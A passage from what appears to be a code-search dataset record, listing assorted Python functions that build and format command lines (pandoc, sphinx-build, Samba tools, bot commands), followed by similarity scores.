arg.get('choices')\n nested_args = arg.get('args')\n if nested_args:\n if choices:\n raise error.CommandDescriptionError('An argument can\\'t have both '\n '\"choices\" and \"args\" attributes', command)\n choices = (nested_args,)\n if choices:\n # Suppress choice delimiters if we've already emitted the square\n # brackets to indicate an optional argument. This is so we get\n # something simpler (e.g. \"[this | that]\" ) instead of getting\n # doubled delimiters (e.g. \"[{this | that}]\").\n if not optional:\n syntax_string += '{'\n \n for j, choice in enumerate(choices):\n if j > 0:\n syntax_string += ' | '\n choice_args = _get_choice_args(choice)\n choice_syntax_string = _get_command_args_syntax_help_string(command,\n is_no_command,\n choice_args)\n syntax_string += choice_syntax_string\n \n if not optional:\n syntax_string += '}'\n else:\n field = arg.get('field')\n \n tag = arg.get('tag')\n if tag:\n syntax_string += tag + ' '\n \n token = arg.get('token')\n if token:\n syntax_string += token\n\n if (field != None) and (arg.get('type') != 'boolean'):\n help_name = arg.get('help-name')\n if help_name:\n help_name = '<' + help_name + '>'\n else:\n if arg.get('type') == 'enum':\n values = arg.get('values')\n if values:\n if _is_string(values):\n values = (values,)\n help_name = ' | '.join(values)\n if len(values) > 1:\n help_name = '{' + help_name + '}'\n if not help_name:\n help_name = '<' + field + '>'\n syntax_string += help_name\n if optional:\n syntax_string += ']'\n \n return syntax_string", "def get_commands():\n return \"Commands:\\n 1 [Find shortest path between given cities]\\n 2 [Find shortest path between random cities]\\n 3 [See list of cities]\\n 4 [Close application]\\n\"", "def _arg_to_command(k: str, v: Optional[Union[str, int, float]] = None):\n command = _arg_to_flag(k)\n if v is not None:\n command += f' {v}'\n return command", "def __str__(self):\n self._validate()\n commandline = \"%s \" % self.program_name\n for parameter in self.parameters:\n if parameter.is_set:\n #This will include a trailing space:\n commandline += str(parameter)\n return commandline.strip() # remove trailing space", "def make_command(remit=str(),\n source=str(),\n writer=str(),\n extension=str(),\n pandoc_options=list()):\n # if no extension specified, infer it from writer\n if not extension and writer:\n if writer in spec.DEFAULT_EXTENSION:\n extension = spec.DEFAULT_EXTENSION[writer]\n else:\n print('WARNING: No known extension for writer \"%s\", '\n 'using \".UNKNOWN\"' % writer)\n extension = '.UNKNOWN'\n # start building the command...\n # remit\n command = [remit]\n # input file\n # - if remit_WRITER.md exists, then use it!\n writer_specific_source = remit + '_' + writer + '.md'\n if os.path.exists(writer_specific_source):\n command += [writer_specific_source]\n else:\n command += [remit + '.md']\n # writer\n if writer:\n command += ['-t']\n command += [writer]\n # other options\n command.extend(pandoc_options)\n # output\n # - first build output filename...\n if writer == '':\n pretty_writer_string = 'default'\n else:\n pretty_writer_string = writer\n target = os.path.join(os.getcwd(), '..', '..', 'output-'+remit,\n source,\n pretty_writer_string\n + ''.join(pandoc_options)\n + extension)\n target = os.path.normpath(target)\n target = os.path.relpath(target)\n command += ['-o']\n command += [target]\n # panzer-specific options\n if remit == 'panzer':\n command += ['---quiet']\n # support directory\n command += ['---panzer-support']\n target = os.path.join(os.getcwd(), '..', '..', 
'dot-panzer')\n target = os.path.normpath(target)\n target = os.path.relpath(target)\n command += [target]\n # debug outputs\n # command += ['---debug']\n # target = os.path.join(os.getcwd(), '..', '..', 'output-'+remit,\n # source, 'debug', 'debug_' + source)\n # target = os.path.normpath(target)\n # command += [target\n # + \"_\"\n # + pretty_writer_string\n # + ''.join(pandoc_options)]\n # done!\n return command", "def _make_cmdline(self, line):\n if isinstance(line, list):\n parts = line\n else:\n parts = line.split(\" \", 1)\n cmd = parts[0]\n exe = os.path.join(BINDIR, cmd)\n\n python_cmds = [\"samba-tool\",\n \"samba_dnsupdate\",\n \"samba_upgradedns\",\n \"script/traffic_replay\",\n \"script/traffic_learner\"]\n\n if os.path.exists(exe):\n parts[0] = exe\n if cmd in python_cmds and os.getenv(\"PYTHON\", None):\n parts.insert(0, os.environ[\"PYTHON\"])\n\n if not isinstance(line, list):\n line = \" \".join(parts)\n\n return line", "def at_cmdset_creation(self):\n self.add(power.CmdPower())\n self.add(CmdCursedBone())\n # self.add(CmdDeathSpike())\n \"\"\"\n self.add(CmdAnchor())\n self.add(CmdBloodCloak())\n self.add(CmdBloodShield())\n self.add(CmdBloodWard())\n self.add(CmdBodyToMind())\n self.add(CmdBoneScythe())\n self.add(CmdCircleDeath())\n self.add(CmdCorpseBurst())\n self.add(CmdCorpseDrain())\n self.add(CmdCreateBloodGem())\n self.add(CmdCurseDeathLink())\n self.add(CmdDeathRain())\n self.add(CmdDeathWard())\n self.add(CmdDisease())\n self.add(CmdBoneDust())\n self.add(CmdGloom())\n self.add(CmdImbueBlood())\n self.add(CmdImbueDeath())\n self.add(CmdMassSilence())\n self.add(CmdMassSleep())\n self.add(CmdMassAnchor())\n self.add(CmdMassWeakness())\n self.add(CmdPlague())\n self.add(CmdPoison())\n self.add(CmdPoisonCloud())\n self.add(CmdSilence())\n self.add(CmdSleep())\n self.add(CmdSpectralHunter())\n self.add(CmdSummon())\n self.add(CmdSummonCorruptedMan())\n self.add(CmdSummonCursedArmy())\n self.add(CmdSummonCursedMan())\n self.add(CmdSummonReanimatedMan())\n self.add(CmdTeleport())\n self.add(CmdTeleportOther())\n self.add(CmdTransferPain())\n self.add(CmdVampiricClaw())\n self.add(CmdVampiricTouch())\n self.add(CmdWeakness())\n \"\"\"", "def test_commandRepr(self):\n repr(imap4.Command(b\"COMMAND\", [b\"arg\"], (b'extra')))", "def get_command(self) -> str:\n return 'title'", "def RUN_CMD(self) -> str:\n args = \" \\ \\n \".join(CONFIG.WEBPACK.ARGS)\n return f\"{CONFIG.WEBPACK.BIN} \\ \\n {args}\"", "def make_help_cmd(cmd, docstring):\n def help_cmd(message=docstring, cmd=cmd):\n print('=' * 15)\n print('\\nHelp for command %s:\\n' % (cmd,))\n print(message.strip())\n print('')\n print('=' * 15)\n print('')\n\n return help_cmd", "def build_command_line_parameters(params, command_name=\"-param\"):\n if params is None:\n return \"\"\n res = []\n for k, v in sorted(params.items()):\n if '\"' in v:\n v = v.replace('\"', '\\\\\"')\n one = '{2} {0}=\"{1}\"'.format(k, v, command_name)\n res.append(one)\n return \" \".join(res)", "def _sphinx_build(self, kind: str):\n if kind not in (\"html\", \"latex\"):\n raise ValueError(f\"kind must be html or latex, not {kind}\")\n\n cmd = [\"sphinx-build\", \"-b\", kind]\n if self.num_jobs:\n cmd += [\"-j\", self.num_jobs]\n if self.warnings_are_errors:\n cmd += [\"-W\", \"--keep-going\"]\n if self.verbosity:\n cmd.append(f\"-{'v' * self.verbosity}\")\n cmd += [\n \"-d\",\n os.path.join(BUILD_PATH, \"doctrees\"),\n SOURCE_PATH,\n os.path.join(BUILD_PATH, kind),\n ]\n return subprocess.call(cmd)", "def _sphinx_build(self, kind: str):\n 
if kind not in (\"html\", \"latex\"):\n raise ValueError(f\"kind must be html or latex, not {kind}\")\n\n cmd = [\"sphinx-build\", \"-b\", kind]\n if self.num_jobs:\n cmd += [\"-j\", self.num_jobs]\n if self.warnings_are_errors:\n cmd += [\"-W\", \"--keep-going\"]\n if self.verbosity:\n cmd.append(f\"-{'v' * self.verbosity}\")\n cmd += [\n \"-d\",\n os.path.join(BUILD_PATH, \"doctrees\"),\n SOURCE_PATH,\n os.path.join(BUILD_PATH, kind),\n ]\n return subprocess.call(cmd)", "def get_commands(bot):\n new_commands = []\n\n new_commands.append(Command(\n 'mycommand', subcommands=[\n SubCommand(\n Opt('myoption'),\n doc='This is a simple command with a single required option.'),\n SubCommand(\n Opt('custom', optional=True),\n Opt('attached', optional=True, attached='attached argument'),\n doc='This has two different optional options, one without an attached '\n 'parameter, and the other requiring an attached parameter.'),\n SubCommand(\n Opt('trailing'),\n Arg('arg 1'),\n Arg('arg 2'),\n Arg('arg 3', argtype=ArgTypes.SPLIT, additional='more args'),\n doc='This command requires a lot of trailing arguments.'),\n SubCommand(\n Opt('grouped'),\n Arg('grouped arguments', argtype=ArgTypes.MERGED),\n doc='This will group all given arguments as a single string.'),\n SubCommand(\n Opt('complex', attached='attached'),\n Opt('other', optional=True, attached='also required'),\n Arg('arg 1'),\n Arg('arg 2', argtype=ArgTypes.SPLIT_OPTIONAL, additional='more args'),\n doc='The complex option has a required attached parameter, and the '\n '\\'other\\' option also has a required attached parameter if '\n '\\'other\\' is included. Additionally, there will be a requirement '\n 'of at least 1 trailing argument.'),\n SubCommand(\n Opt('marquee'),\n Arg('text', argtype=ArgTypes.MERGED,\n check=lambda b, m, v, *a: len(v) <= 100,\n check_error=\"Marquee message must be less than 100 characters long.\"),\n doc='Creates a marquee that loops 3 times.')],\n shortcuts=[\n Shortcut(\n 'complex', 'complex {attached} other {other} {arg 1} {arg 2}',\n Arg('attached'), Arg('other'), Arg('arg 1'),\n Arg('arg 2', argtype=ArgTypes.SPLIT_OPTIONAL)),\n Shortcut(\n 'marquee', 'marquee {text}', Arg('text', argtype=ArgTypes.MERGED))],\n description='Your command description here.',\n other='This text is optional - it just shows up after everything '\n 'else. Quick note, all of the commands here can only be used by '\n 'bot moderators or above, as indicated by elevated_level. A '\n 'level of 2 would mean only server owners or above can use the '\n 'command, and a level of 3 would restrict the command to only '\n 'the bot owners.',\n elevated_level=1, category='demo'))\n\n new_commands.append(Command(\n 'myothercommand', subcommands=[\n SubCommand(\n Arg('text', argtype=ArgTypes.MERGED_OPTIONAL),\n doc='This traps all further commands from being executed.'),\n SubCommand(\n Opt('order'), Opt('matters'),\n doc='It is impossible to access this command because the first '\n 'subcommand will always be satisfied first. Order of the '\n 'subcommand matters!'),\n SubCommand(\n Opt('sample'), Opt('foo'), Opt('bar'),\n doc='Also impossible to access. This subcommand just adds some '\n 'keywords to the command.')],\n description='Only bot owners can see this text!',\n other='Note that no shortcuts were defined. They, too, are optional. '\n 'Also, this command is hidden, which means that only the bot '\n 'owners can see this command listed from the help command. 
'\n 'However, unless the command is configured with an elevated '\n 'permissions level, any user can still execute the command. '\n 'Users still will not be able to see the specific help for this '\n 'command, though. Lastly, this command is disabled in DMs.',\n hidden=True, allow_direct=False, category='demo'))\n\n new_commands.append(Command(\n 'notify', subcommands=[\n SubCommand(\n Arg('text', argtype=ArgTypes.MERGED),\n doc='Notify the owners with some text!')],\n other='This command uses a custom function. It is called with the '\n 'same arguments as get_response. The command will show up to '\n 'all users in the help command, but can only be used by server '\n 'owners, as it is disallowed in direct messages.',\n elevated_level=2, allow_direct=False, function=custom_notify,\n category='demo'))\n\n new_commands.append(Command(\n 'wait', other='Use this command to demo the wait_for functionality', category='demo'))\n\n return new_commands", "def get_usage_command(self):\n return textwrap.fill(self.sbtools.parser.expand_prog_name(\"Type '%prog help %s' for usage.\") % (self.tool.get_command()), 78)", "def _generateBoolectorCommand(self, location):\n command = []\n\n command.append(config.SOLVER_BOOLECTOR)\n command.append(\"--model\")\n command.append(\"--smt2\")\n command.append(\"-\" + SatSolver.getName(self.satSolver))\n command.append(location)\n\n return command", "def _build_command(tables, fixtures_path, fixture_name):\n command = \"python manage.py dumpdata{0} --indent=4 > {1}/{2}\".format(\n tables, fixtures_path, fixture_name\n )\n return command", "def get_usage_command(self):\n return textwrap.fill(self.expand_prog_name(\"Type '%prog help' for usage information.\"), 78)", "def command(fxn):\n\tCMDTABLE[fxn.__name__] = (fxn, fxn.__doc__)\n\treturn fxn", "def _GetCommand(self):\n cmd = [FLAGS.openstack_cli_path]\n cmd.extend(self.args)\n for flag_name, values in six.iteritems(self.flags):\n flag_name_str = '--%s' % flag_name\n if values is True:\n cmd.append(flag_name_str)\n else:\n values_iterable = values if isinstance(values, list) else [values]\n for value in values_iterable:\n cmd.append(flag_name_str)\n cmd.append(str(value))\n cmd.extend(self.additional_flags)\n return cmd", "def __init__(self, command, target: str):\n self.command = command\n self.target = target", "def __str__(self):\n out = \"<\"\n out += str(type(self)).split(\"'\")[1].split(\".\")[-1]\n out += \" \" + str(self.name)\n out += \" id:\" + str(self.id)\n out += \" owner:\" + str(self.owner.id)\n\n if self.tags is not None and len(self.tags):\n out += \" Tags:\"\n for tag in self.tags:\n out += \" \" + str(tag)\n\n if self.is_built:\n out += \" built\"\n\n out += \">\"\n out += \"\\n\"\n _self = self\n\n # out += f\"def {self.name}(\"\n # out += \", \".join(f\"arg_{extract_tag(p)}\" for p in self.find_placeholders(\"input\"))\n # out += \"):\\n\"\n # for action in self.actions:\n # line = \" \"\n # if action.return_ids is not None:\n # if isinstance(action.return_ids, PlaceHolder):\n # tag = extract_tag(action.return_ids)\n # line += f\"_{tag} = \"\n # elif isinstance(action.return_ids, tuple):\n # line += (\n # \", \".join(\n # f\"_{extract_tag(o)}\" if isinstance(o, PlaceHolder) else str(o)\n # for o in action.return_ids\n # )\n # + \" = \"\n # )\n # else:\n # line += str(action.return_ids) + \" = \"\n # if action.target is not None:\n # line += f\"_{extract_tag(self.placeholders[action.target.value])}.\"\n # line += action.name + \"(\"\n # line += \", \".join(\n # f\"_{extract_tag(arg)}\" if 
isinstance(arg, PlaceHolder) else str(arg)\n # for arg in action.args\n # )\n # if action.kwargs:\n # line += \", \" + \", \".join(f\"{k}={w}\" for k, w in action.kwargs.items())\n # line += \")\\n\"\n # out += line\n\n # out += \" return \"\n # out += \", \".join(f\"_{extract_tag(p)}\" for p in self.find_placeholders(\"output\"))\n\n return out" ]
[ "0.79212874", "0.744362", "0.7122005", "0.707842", "0.70561314", "0.69483036", "0.6882322", "0.6856377", "0.6743266", "0.67065525", "0.66842824", "0.6522843", "0.6477476", "0.64324766", "0.6427607", "0.6427607", "0.6427607", "0.64067274", "0.6403515", "0.63853884", "0.6316158", "0.62879395", "0.6261205", "0.6239784", "0.6209317", "0.6195894", "0.61808604", "0.6140388", "0.6045833", "0.60432404", "0.60354465", "0.6023365", "0.60027", "0.5998394", "0.5991712", "0.5984404", "0.59828097", "0.59801316", "0.5978604", "0.5920368", "0.5909353", "0.5906354", "0.590552", "0.5888428", "0.58855724", "0.58761764", "0.5853196", "0.5848233", "0.58479804", "0.583414", "0.5829132", "0.5821653", "0.5819434", "0.5810961", "0.5796724", "0.5775879", "0.5774709", "0.5764483", "0.5764419", "0.5758241", "0.5739513", "0.5716109", "0.57116747", "0.5684428", "0.5680956", "0.5676957", "0.5672344", "0.5668839", "0.5662765", "0.56601995", "0.5654405", "0.5644582", "0.5635653", "0.5629358", "0.5628961", "0.5613263", "0.5611277", "0.560114", "0.55839133", "0.5564637", "0.55537593", "0.5551078", "0.55465025", "0.554161", "0.5536095", "0.5523544", "0.5521729", "0.55208194", "0.5503907", "0.5503343", "0.5498128", "0.5498128", "0.5486129", "0.5480395", "0.54713064", "0.5468784", "0.5464561", "0.5464322", "0.54498553", "0.5443376", "0.54380846" ]
0.0
-1
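A minimal illustrative sketch, not a row of the dataset: most of the negative snippets in the record above share one pattern, accumulating command-line arguments as a list and only quoting and joining them at the very end. All names below are hypothetical.

import shlex


def build_command(executable, flags=None, positional=None):
    # Assemble an argv list first; rendering to a string happens last,
    # with shlex.quote guarding against whitespace and shell metacharacters.
    argv = [executable]
    for name, value in (flags or {}).items():
        argv.append("--" + name)
        if value is not None:
            argv.append(str(value))
    argv.extend(positional or [])
    return argv, " ".join(shlex.quote(part) for part in argv)


argv, rendered = build_command(
    "mytool", flags={"count": 3, "verbose": None}, positional=["in file.txt"]
)
print(argv)      # ['mytool', '--count', '3', '--verbose', 'in file.txt']
print(rendered)  # mytool --count 3 --verbose 'in file.txt'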
Return a new instance of a DevMode object.
def __init__(self, mb_info, switch_config): self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM) self.iop_switch_config = switch_config
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _new_instance(self):\n return self.__class__(self._vmodule)", "def _new_instance(self):\n return self.__class__(self._fmodule)", "def _new_instance(self):\n return self.__class__(self._fmodule)", "def debug(self):\n return Debug(self)", "def dev_mode(self):\r\n return self._dev_mode", "def new(dxfversion='AC1009'):\n dwg = Drawing.new(dxfversion)\n if dwg.dxfversion > 'AC1009':\n dwg.reset_fingerprintguid()\n dwg.reset_versionguid()\n return dwg", "def DevMode(self):\n for var in DEV_CONFIG:\n self.Cover(var, DEV_CONFIG[var], layer = SETTINGS_LAYER)", "def new(cls):\n return cls()", "def __new__(cls, debug=False):\n if not App.instance:\n App.instance = App.__OnlyApp(debug)\n return App.instance", "def create_instance(c_instance):\n return LemaurPad(c_instance)", "def new_instance(valid, test_mode):\n database = SensorsTable(test_mode=test_mode)\n implementations = SensorGetter.get_sensor_implementations()\n return SensorUpdate(valid, database, implementations, Epidata)", "def __new__(cls, manager, device_config, log_file_name, log_directory):\n # slowly migrate away from using 'hub_port_name' but maintain backwards compatibility\n if \"console_port_name\" not in device_config[\"persistent\"]:\n device_config[\"persistent\"][\"console_port_name\"] = \\\n device_config[\"persistent\"][\"hub_port_name\"]\n\n identifier = device_config[\"persistent\"][\"console_port_name\"]\n if identifier not in cls._instances:\n obj = super(Cambrionix, cls).__new__(cls)\n cls._instances[identifier] = obj\n\n return cls._instances[identifier]", "def create_device():\n sonyapilib.device.TIMEOUT = 0.1\n device = SonyDevice(\"test\", \"test\")\n device.api_version = 3\n device.cookies = jsonpickle.decode(read_file(\"data/cookies.json\"))\n return device", "def clone(self, link_kwargs=None, optimizer=\"\", message=None):\n new_linker = self.linker.clone(**link_kwargs)\n new_optimizer = optimizer\n if optimizer == \"\":\n new_optimizer = self.provided_optimizer\n new_mode = type(self)(linker=new_linker,\n optimizer=new_optimizer)\n # If self is in the list or profiles to print, then add the\n # new one as well\n if self in prof_mode_instance_to_print:\n prof_mode_instance_to_print.append(new_mode)\n\n if message:\n new_mode.message = message\n\n return new_mode", "def develop_mode(self):\n return self._parent.develop_mode", "def set_debug_mode(self):\n self.debug_mode = True", "def new(cls, **kwargs):\n return cls(**kwargs)", "def __new__(cls):\n builder = get_builder('GwitterWindow')\n new_object = builder.get_object(\"gwitter_window\")\n new_object.finish_initializing(builder)\n return new_object", "def start_env(config: OmegaConf, debug_env=False) -> gym.Env:\n if debug_env:\n env = MineRLDebugEnv(config)\n else:\n environment = config.env.name\n env = gym.make(environment)\n env = ActionShaping(env, config)\n env = ObservationWrapper(env, config)\n return env", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def _new_session(self):\n # Create a new session for this model, initialize\n # variables, and save / restore from checkpoint.\n sess_cfg = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)\n sess_cfg.gpu_options.allow_growth = True\n self._session = tf.Session('', config=sess_cfg)\n self._session.run([self.meval.init])\n\n return self._session", "def debug_mode(self):\n return self._debug_mode", "def __init__(self, device_mode, loop):\n self.loop = loop\n self.device_mode = device_mode\n if self.device_mode == \"stationary\":\n 
self.openface = OpenFaceInstance()\n self.openface.startProcess()\n self.stationary_eye_tracker = StationaryEyeTracker()\n elif self.device_mode == \"mobile\":\n self.openpose = OpenPoseInstance()\n self.openpose.startProcess()\n self.mobile_eye_tracker = MobileEyeTracker()\n self.mobile_eye_tracker.calibrate()\n\n self.wristband = Wristband(self.loop)", "def mode(self) -> Mode:\n ...", "def __new__(cls):\n game_engine = get_gameengine()\n if game_engine is not None:\n return game_engine\n else:\n return super(GameEngine, cls).__new__(cls)\n # end if", "def __init__(self,\r\n optimizer='fast_run',\r\n stability_patience=None,\r\n check_c_code=None,\r\n check_py_code=None,\r\n check_isfinite=None,\r\n check_preallocated_output=None,\r\n require_matching_strides=None,\r\n linker=None):\r\n\r\n if linker is not None and not issubclass(linker, _Linker):\r\n raise Exception(\"DebugMode can only use its own linker! You \"\r\n \"should not provide one.\", linker)\r\n\r\n super(DebugMode, self).__init__(\r\n optimizer=optimizer,\r\n linker=_Linker)\r\n\r\n if stability_patience is not None:\r\n self.stability_patience = stability_patience\r\n\r\n if check_c_code is not None:\r\n self.check_c_code = check_c_code\r\n\r\n if check_py_code is not None:\r\n self.check_py_code = check_py_code\r\n\r\n if check_isfinite is not None:\r\n self.check_isfinite = check_isfinite\r\n\r\n if check_preallocated_output is not None:\r\n # Copy to avoid sharing the same list across different instances\r\n self.check_preallocated_output = check_preallocated_output[:]\r\n\r\n if require_matching_strides is not None:\r\n self.require_matching_strides = require_matching_strides\r\n\r\n if not (self.check_c_code or self.check_py_code):\r\n raise ValueError('DebugMode has to check at least one of c and py '\r\n 'code')", "def new_session(self):\n self._session = self.vspk.NUVSDSession(\n username=self.user,\n password=self.password,\n enterprise=self.enterprise,\n api_url=self.uri)\n\n self._session.start()\n if not self.default_enterprise:\n self.default_enterprise = self.get_enterprise_by_name(\n self.default_netpartition_name)\n\n self.assertIsNotNone(self.default_enterprise,\n \"Should have a default \"\n \"enterprise for Nuage plugin\")\n\n return self._session", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def _new_instance(self):\n return self.__class__(self._fmodule, self._tensor_rank)", "def gpu(device_id=0):\n return Context('gpu', device_id)", "def gpu(device_id=0):\n return Context('gpu', device_id)", "def parserFactory(intLanguageName, debugMode):\r\n #if text.getDebug() != debugMode:\r\n # text.setDebugRecurs(debugMode)\r\n\r\n return THE_PARSER", "def development_mode(self):\n self.monitor_leaks = True", "def New():\n Self = $classname()\n Self._initialize_()\n Self._update_()\n return Self", "def create(cls):\n pass\n return cls()", "def createBrowser(self, mode=False):\n\t\tbr = mechanize.Browser(factory = mechanize.RobustFactory())\n\t\tbr.set_handle_equiv(True)\n\t\tbr.set_handle_redirect(True)\n\t\tbr.set_handle_referer(True)\n\t\tbr.set_handle_robots(False)\n\t\tbr.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)\n\t\tbr.set_debug_http(mode)\n\t\tbr.set_debug_responses(mode)\n\t\tbr.set_debug_redirects(mode)\n\t\tbr.addheaders = [(\"User-Agent\", \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) C hrome/16.0.912.63 Safari/535.7\")]\n\t\tcj = cookielib.LWPCookieJar()\n\t\tbr.set_cookiejar(cj)\n\t\treturn br", "def 
make_env(\n\t\tdomain_name,\n\t\ttask_name,\n\t\tseed=0,\n\t\tepisode_length=1000,\n\t\tframe_stack=3,\n\t\taction_repeat=4,\n\t\timage_size=100,\n\t\tmode='original'\n\t):\n\tassert mode in {'original', 'color_easy', 'color_hard', 'video_easy', 'video_hard'}, \\\n\t\tf'specified mode \"{mode}\" is not supported'\n\n\tenv = dmc2gym.make(\n\t\tdomain_name=domain_name,\n\t\ttask_name=task_name,\n\t\tseed=seed,\n\t\tvisualize_reward=False,\n\t\tfrom_pixels=True,\n\t\theight=image_size,\n\t\twidth=image_size,\n\t\tepisode_length=episode_length,\n\t\tframe_skip=action_repeat\n\t)\n\tenv = VideoWrapper(env, mode, seed)\n\tenv = FrameStack(env, frame_stack)\n\tenv = RandomizationWrapper(env, mode, seed)\n\n\treturn env", "def create_mode(self, mode_slug, mode_name, min_price=0, suggested_prices='', currency='usd'):\r\n return CourseMode.objects.get_or_create(\r\n course_id=self.course_key,\r\n mode_display_name=mode_name,\r\n mode_slug=mode_slug,\r\n min_price=min_price,\r\n suggested_prices=suggested_prices,\r\n currency=currency,\r\n )", "def doc_dev_factory(global_config, **local_conf):\n\treturn make_app(blueprints.developer_portal, settings.DevelopmentConfig)", "def createCamera():\n prefs = getPreferences()\n\n # Remove any pre-existing preview camera.\n if CAM_NAME in bpy.data.cameras:\n bpy.data.cameras.remove(bpy.data.cameras[CAM_NAME], do_unlink=True)\n\n # Store the current scene camera.\n cache.values[\"sceneCamera\"] = bpy.context.scene.camera\n\n # Create a new camera and name it accordingly.\n bpy.ops.object.camera_add()\n cam = bpy.context.object\n cam.name = CAM_NAME\n cam.data.name = CAM_NAME\n cache.values[\"camera\"] = cam\n\n # Set the camera properties.\n cam.location = Vector((10, -10, 10))\n rot = prefs.camAngle_value\n cam.rotation_euler = Euler((math.radians(rot[0]),\n math.radians(rot[1]),\n math.radians(rot[2])))\n cam.data.clip_start = prefs.clipStart_value\n cam.data.clip_end = prefs.clipEnd_value\n cam.data.lens = prefs.focal_value\n\n view3d = get3dView()\n # Store the current view camera, if any.\n cache.values[\"viewCamera\"] = view3d.camera if view3d.camera else None\n # Set the render camera for the view.\n view3d.camera = cam", "def __init__(self, experiences=None, mode=None, shape=None, pixel_width=None, pixel_height=None, dpi=None, current_pixel_width=None, current_pixel_height=None, touch=None, keyboard=None, video=None):\n # type: (Optional[List[Experience_99e18a0a]], Optional[Mode_968d4aaa], Optional[Shape_d8a6bf70], Optional[float], Optional[float], Optional[float], Optional[float], Optional[float], Optional[List[Touch_93b302c]], Optional[List[Keyboard_6e759daa]], Optional[ViewportStateVideo_a9fffd46]) -> None\n self.__discriminator_value = None # type: str\n\n self.experiences = experiences\n self.mode = mode\n self.shape = shape\n self.pixel_width = pixel_width\n self.pixel_height = pixel_height\n self.dpi = dpi\n self.current_pixel_width = current_pixel_width\n self.current_pixel_height = current_pixel_height\n self.touch = touch\n self.keyboard = keyboard\n self.video = video", "def dev():\n trio.run(_dev_main)", "def clone(self):\n st = Connect4Env(width=self.width, height=self.height)\n st.current_player = self.current_player\n st.winner = self.winner\n st.board = np.array([self.board[col][:] for col in range(self.width)])\n return st", "def make_env():\n aigym_path = \"video/\"\n env = retro.make(game='MortalKombatII-Genesis',state='Level1.LiuKangVsJax')\n env = wrappers.Monitor(env, aigym_path,video_callable=False ,force=True) #, 
video_callable=False \n env = ObservationWraperMK(env)\n env = PlayerOneNetworkControllerWrapper(env)\n env._max_episode_steps = 350\n #env.render()\n\n return env", "def make(self):\n return _spacegrant_swig.udp_debug_sptr_make(self)", "def new(self):\n self._init()", "def _config_session(self):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.gpu_options.visible_device_list = str(self.device_num)\n return tf.Session(config=config)", "def debug(mode=True):\r\n global DEBUG\r\n DEBUG = bool(mode)", "def create_instance(self, **kwargs):\r\n create_options = self._generate_create_dict(**kwargs)\r\n return self.guest.createObject(create_options)", "def create_instance(c_instance):\n return OpenLabs(c_instance)", "def create_instance(c_instance):\n return VCM600(c_instance)", "def create_instance(c_instance):\n return VCM600(c_instance)", "def __init__(self, device):\n self._unique_id = device\n self._device = AehW4a1(device)\n self._fan_modes = FAN_MODES\n self._swing_modes = SWING_MODES\n self._preset_modes = PRESET_MODES\n self._attr_available = False\n self._on = None\n self._current_temperature = None\n self._target_temperature = None\n self._attr_hvac_mode = None\n self._fan_mode = None\n self._swing_mode = None\n self._preset_mode = None\n self._previous_state = None", "def get_or_create_context(self, devnum):\n if devnum is None:\n attached_ctx = self._get_attached_context()\n if attached_ctx is None:\n return self._get_or_create_context_uncached(devnum)\n else:\n return attached_ctx\n else:\n if USE_NV_BINDING:\n devnum = int(devnum)\n return self._activate_context_for(devnum)", "def make(self, *args, **kwargs):\r\n self.make_module_instance(args,kwargs)\r\n\r\n mode = kwargs.pop('mode', theano.compile.mode.get_default_mode())\r\n rval = self.make_no_init(mode)\r\n if hasattr(rval, 'initialize'):\r\n rval.initialize(*args, **kwargs)\r\n return rval", "def create_browser_instance():\n cmd = [browser_sync_path, 'start', '--proxy=localhost:8000']\n check_output(cmd)", "def develope_mode(self, _):\n global develope_mode\n develope_mode = not develope_mode", "def is_dev(self):\n\n return self.dev", "def create_device(cls, dev):\n obj = super().__new__(cls)\n if isinstance(dev, Device):\n obj.sycl_queue_ = dev.sycl_queue\n elif isinstance(dev, dpctl.SyclQueue):\n obj.sycl_queue_ = dev\n elif isinstance(dev, dpctl.SyclDevice):\n par = dev.parent_device\n if par is None:\n obj.sycl_queue_ = dpctl.SyclQueue(dev)\n else:\n raise ValueError(\n \"Using non-root device {} to specify offloading \"\n \"target is ambiguous. 
Please use dpctl.SyclQueue \"\n \"targeting this device\".format(dev)\n )\n else:\n if dev is None:\n obj.sycl_queue_ = dpctl.SyclQueue()\n else:\n obj.sycl_queue_ = dpctl.SyclQueue(dev)\n return obj", "def create_boot_dev(self):\n\t\treturn handle_to_object(call_sdk_function('PrlVmCfg_CreateBootDev', self.handle))", "def GetDebugMode(self):\n return bool(self.debug_mode)", "def new_browser():\n\n\tbrowser = mechanize.Browser()\n\tbrowser.set_handle_robots(False)\n\tbrowser.set_handle_refresh(False)\n\n\treturn browser", "def open(self):\n if dev[self.id] != FLI_INVALID_DEVICE:\n raise FliError(\"Device already opened\")\n dev[self.id] = FLIDEVICE_CAMERA\n\n # set default parameters\n self.setTemperature(CCD_TEMP)\n self.setHBin(1)\n self.setVBin(1)\n self.setExpTime(0)\n self.setFrame(0, 0, 1072, 1033)\n with self.lock:\n self.status = READY\n self.visibleExpArea = (24, 9, 1048, 1033)\n self.defaultExpArea = (0, 0, 1072, 1033)\n self.expArea = (0, 0, 1072, 1033)\n self.regions = ((0, 0, 0), (0, 0, 0))", "def create(window_type=WindowType.DEFAULT, rate=10):\n return BasicController(Visualiser(window_type=window_type))", "def SetDebugMode(enabled=True):\n global option\n option['debug_mode'] = enabled", "def showUI(cls):\r\n win = cls()\r\n win.create()\r\n return win", "def debug_mode(self, debug_mode):\n\n self._debug_mode = debug_mode", "def set_debug_mode(self, value):\n self.debug = value", "def is_development_mode(registry):\n if 'mode' in registry.settings:\n return registry.settings['mode'].lower() == 'development'\n return False", "def create_vm_dev(self, nDeviceType):\n\t\treturn handle_to_object(call_sdk_function('PrlVmCfg_CreateVmDev', self.handle, nDeviceType))", "def PRODUCTION(cls):\n\n return DataCenter.Environment(\"https://www.zohoapis.eu\", cls().get_iam_url(), cls().get_file_upload_url())", "def startMode(self):\n raise NotImplementedError('startMode() should be implemented')", "def new_session(self):\n return self.Session()", "def init_display(size=(640, 480), flags = 0):\n warn(\"\"\"\n In an ongoing attempt at cleaning up rabbyt, init_display has been\n deprecated and will be removed in a future version. You can achive the\n same result by doing this::\n\n pygame.init()\n 